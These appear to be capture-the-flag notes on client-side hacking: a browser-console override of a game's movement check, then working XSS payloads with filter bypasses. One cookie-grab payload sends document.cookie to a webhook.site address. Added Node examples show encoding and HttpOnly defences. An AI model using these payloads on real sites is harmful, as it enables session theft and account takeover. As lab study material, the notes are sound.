Write an updated function (similar to the original) that doesn't do the rule check
function canMoveTo(destX, destY) {
// The original read the 15x15 pixel block at the destination and inspected it;
// here the pixels are still read but no longer checked, so every move is allowed
var imgData = context.getImageData(destX, destY, 15, 15);
var data = imgData.data;
var canMove = 1; // 1 means: the rectangle can move
return canMove;
}
Console tab > paste your function there and click 'run'!
Now you can move anywhere you want!
XSS
JavaScript injections (also: )
Goal: pop an alert
Tricks to get past filters that might:
Block 'script' but not 'sCript'
Trim <script> once but not the recursive <sc<script>ript>
Blacklist script tags, but you can still trigger an error handler that pops (e.g. onerror)
Block 'alert' but not the concatenation 'al'+'ert' passed to 'eval'
Block 'alert' but allow String.fromCharCode
Inject new JavaScript using 'Inspect Element'
Mistake in the code: it trusts the index.php path (see below)
--------------------
http://abc.so/index.php?name=hack
http://abc.so/index.php?name=hack<script>
http://abc.so/index.php?name=hack<script></script>
http://abc.so/index.php?name=hack<h1>TEST</h1>
http://abc.so/index.php?name=hack<script>alert(1)</script>
http://abc.so/index.php?name=hack<script>alert('flag')</script>
--------------------
http://abc.so/index.php?name=hack%3Cscript%3Ealert(%27flag%27)%3C/script%3E
http://abc.so/index.php?name=hack<sc<script>ript>alert('flag')</sc</script>ript>
--------------------
http://abc.so/index.php?name=hack<a href='javascript:alert(1)'>test</a>
http://abc.so/index.php?name=hack<a onmouseover='alert(1)'>test</a>
http://abc.so/index.php?name=hack<img src="zzz.jpg" onerror='alert('flag')'></img>
http://abc.so/index.php?name=hack%3Cimg%20src=%22zzz.jpg%22%20onerror=%27alert(flag)%27%3E%3C/img%3E
--------------------
http://abc.so/index.php?name=hack<script>eval("al"+"ert(flag)")</script>
http://abc.so/index.php?name=hack<script>eval("al"%2b"ert(flag)")</script>
String.fromCharCode(97,108,101,114,116,40,49,41) ..."alert(1)"
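Added example (not part of these notes, and not the challenge's own filter code): why the filters listed above fail and what actually fixes it. The filter functions, escapeHtml and evaluateFilter are made up for illustration; the inputs are the payloads from the list above, copied in as constructed test data. It runs under Node without dependencies.

```javascript
// Hypothetical server-side filter of the kind the notes describe: it removes the
// literal tags once, case-sensitively. Both weaknesses above are visible here.
function naiveStripScriptTags(input) {
  return input.replace("<script>", "").replace("</script>", "");
}

// A "better" hypothetical filter: case-insensitive and global, but still a single pass,
// so whatever the removal leaves behind is never re-checked.
function stripScriptGlobal(input) {
  return input.replace(/<\/?script>/gi, "");
}

// The real fix: encode for the HTML text context instead of hunting for bad strings.
// Every character that can start a tag or end an attribute is turned into an entity.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Does the rendered HTML still contain something the parser would treat as a tag?
function looksLikeMarkup(html) {
  return /<[a-z!\/]/i.test(html);
}

// Constructed inputs, copied from the payloads tried in the notes above.
const PAYLOADS = [
  "hack<script>alert(1)</script>",
  "hack<sCript>alert(1)</sCript>",
  "hack<sc<script>ript>alert('flag')</sc</script>ript>",
  "hack<a onmouseover='alert(1)'>test</a>",
  "hack<img src=\"zzz.jpg\" onerror='alert(1)'>",
];

// Returns how many payloads still contain live markup after the given filter ran.
function evaluateFilter(filterFn) {
  return PAYLOADS.filter((p) => looksLikeMarkup(filterFn(p))).length;
}

// Sanity run: naive filter lets 4 of 5 through, global filter 3 of 5, encoding 0.
console.log(evaluateFilter(naiveStripScriptTags), evaluateFilter(stripScriptGlobal), evaluateFilter(escapeHtml));
```

The point for the defender: no amount of tag or keyword blacklisting closes the list above, because every filter has to guess the attacker's spelling; output encoding does not guess, it changes the meaning of `<`, `>` and quotes wherever they come from.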
--------------------
Inspect Element
Inject an alert into the existing JavaScript!
<div class="row">
<div class="col-lg-12">
<h1>XSS</h1>
<p>Welcome!
<script>
var $a= "hacker";
</script>
</p>
http://abc.so/index.php?name=";alert(1);var a=" ..works
http://abc.so/index.php?name=";alert(1);" ..works
http://abc.so/index.php?name=";alert('flag');" ..works
--------------------
http://abc.so/index.php?name=";alert('flag');" ..err
http://abc.so/index.php?name=';alert('flag');' ..works
http://abc.so/index.php?name=%27;alert(%27flag%27);%27 ..win!
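Added example (not part of these notes): the snippet above drops the name parameter straight into a JavaScript string literal, which is the context the `";alert(1);"` payloads break out of. The render and check functions below are hypothetical, written to show the encoding a server should apply in that context; the test inputs are the payloads from the notes above, constructed inline. It runs under Node without dependencies.

```javascript
// Unsafe: raw concatenation into the script, exactly what the notes exploit.
function renderUnsafe(name) {
  return '<script>\nvar $a = "' + name + '";\n</script>';
}

// Safe: JSON-encode the value (quotes, backslashes and control characters are handled),
// then also escape < and > so the HTML parser can never see a tag inside the literal,
// and the two JS line terminators that JSON does not escape.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderSafe(name) {
  return "<script>\nvar $a = " + jsStringLiteral(name) + ";\n</script>";
}

// Check: the block must still contain exactly one script tag pair, and the assigned
// value must parse as a single string literal (JSON.parse rejects trailing statements).
function isIntact(scriptHtml) {
  const opens = (scriptHtml.match(/<script/gi) || []).length;
  const closes = (scriptHtml.match(/<\/script/gi) || []).length;
  if (opens !== 1 || closes !== 1) return false;
  const m = scriptHtml.match(/^<script>\nvar \$a = (.*);\n<\/script>$/s);
  if (!m) return false;
  try {
    return typeof JSON.parse(m[1]) === "string";
  } catch (e) {
    return false; // e.g. "";alert(1);var a="" is not one literal
  }
}

// Constructed inputs from the notes above.
const BREAKOUT = '";alert(1);var a="';
const TAGS = "<script>alert('flag')</script>";
console.log(isIntact(renderUnsafe(BREAKOUT)), isIntact(renderSafe(BREAKOUT)));
console.log(isIntact(renderUnsafe(TAGS)), isIntact(renderSafe(TAGS)));
```

HTML entity encoding is the wrong tool here: `&quot;` inside a script block is four literal characters to the JS engine, so the string context needs its own encoder. The same idea applies to the hash trick further down: data from `location.hash` should be written with `textContent`, not `document.write` or `innerHTML`.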
--------------------
Mistake in the code is trusting index.php
So we append /somethingelse to index.php to fire a script!
http://abc.so/index.php/hello"><script>alert(1)</script>
http://abc.so/index.php/hello%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://abcl.so/index.php/hello"><script>alert('flag')<script>
--------------------
decodeURIComponent
Browsers have fixed this (it used to work often)
http://abc.so/index.php#hacker
http://abc.so/index.php#<script>alert(1)</script>
http://abc.so/index.php#<script>alert('flag')</script>
--------------------
Cookie grab flag
http://abc.so/index.php?name=hack
http://abc.so/index.php?name=<script>alert(1)</script> ..ok
<img src="https://myserver/?c=COOKIE" /> ..want this cookie
<script>document.write('<img src="https://myserver/?c='+document.cookie+'" />')</script>
http://abc.so/index.php?name=<script>document.write('<img src="https://myserver/?c='%2bdocument.cookie%2b'" />')</script>
http://abc.so/index.php?name=<script>document.write('<img src="http://webhook.site/6d4c04c4-07a3-4892-8bb3-78f27c7d5aff/?c='%2bdocument.cookie%2b'" />')</script>
http://webhook.site/6d4c04c4-07a3-4892-8bb3-78f27c7d5aff
http://webhook.site/6d4c04c4-07a3-4892-8bb3-78f27c7d5aff?c=SECRET%3flag
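Added example (not part of these notes): the cookie grab above only works because `document.cookie` can read the session cookie. The two hypothetical helpers below show the server-side mitigation, issuing the cookie with HttpOnly (plus Secure and SameSite), and an audit that parses a captured Set-Cookie header and lists what is missing. The header values are constructed samples. It runs under Node without dependencies.

```javascript
// Hypothetical helper a backend would call when issuing the session cookie.
// HttpOnly keeps the value out of document.cookie; it does not stop the XSS itself.
function buildSessionCookie(name, value, { maxAgeSeconds = 3600 } = {}) {
  // Cookie values must not contain ';' or whitespace, so percent-encode the value.
  const safeValue = encodeURIComponent(value);
  return [
    `${name}=${safeValue}`,
    "Path=/",
    `Max-Age=${maxAgeSeconds}`,
    "HttpOnly",
    "Secure",
    "SameSite=Lax",
  ].join("; ");
}

// Audit helper: parse one Set-Cookie header value and report the hardening
// attributes that are absent. Attribute names are case-insensitive per RFC 6265.
function auditSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter(Boolean);
  const [nameValue, ...attrs] = parts;
  if (!nameValue) return null; // empty or malformed header
  const eq = nameValue.indexOf("=");
  const name = eq === -1 ? nameValue : nameValue.slice(0, eq);
  const flags = new Map();
  for (const a of attrs) {
    const i = a.indexOf("=");
    const key = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    const val = i === -1 ? true : a.slice(i + 1);
    flags.set(key, val);
  }
  const missing = [];
  if (!flags.has("httponly")) missing.push("HttpOnly");
  if (!flags.has("secure")) missing.push("Secure");
  if (!flags.has("samesite")) missing.push("SameSite");
  return {
    name,
    httpOnly: flags.has("httponly"),
    secure: flags.has("secure"),
    sameSite: flags.has("samesite") ? flags.get("samesite") : null,
    missing,
  };
}

// Constructed sample: a bare PHP-style session cookie as a vulnerable app might set it.
console.log(auditSetCookie("PHPSESSID=placeholder-session-id; Path=/"));
console.log(auditSetCookie(buildSessionCookie("session", "abc 123")));
```

If the audit reports HttpOnly missing, a payload like the document.write one above exfiltrates the session; with it present, `document.cookie` returns an empty string for that cookie and the attacker is left with the XSS but not the session.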